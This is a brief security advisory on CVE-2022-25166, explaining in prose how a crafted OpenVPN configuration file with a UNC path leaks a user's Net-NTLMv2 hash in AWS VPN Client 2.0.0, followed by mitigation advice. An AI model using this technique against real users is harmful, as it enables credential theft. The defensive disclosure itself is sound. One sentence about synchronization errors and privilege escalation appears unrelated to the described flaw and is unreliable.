CVE-2022-25166

Name of the Vulnerable Software and Affected Versions Amazon AWS VPN Client version 2.0.0

Description The issue is related to the Amazon AWS VPN Client, where it is possible to include a UNC path in the OpenVPN configuration file when referencing file paths for parameters such as auth-user-pass. When this file is imported and the client attempts to validate the file path, it performs an open operation on the path and leaks the user's Net-NTLMv2 hash to an external server. This could be exploited by having a user open a crafted malicious ovpn configuration file. The vulnerability is also related to errors in synchronization when using a shared resource, which can allow an attacker to elevate their privileges or cause a denial of service.

Recommendations For Amazon AWS VPN Client version 2.0.0, consider disabling the import of OpenVPN configuration files that contain UNC paths until a patch is available. Restrict access to the auth-user-pass parameter to minimize the risk of exploitation. Avoid using the auth-user-pass parameter in the OpenVPN configuration file until the issue is resolved. As a temporary workaround, consider monitoring the configuration file for any changes and removing any malicious directives.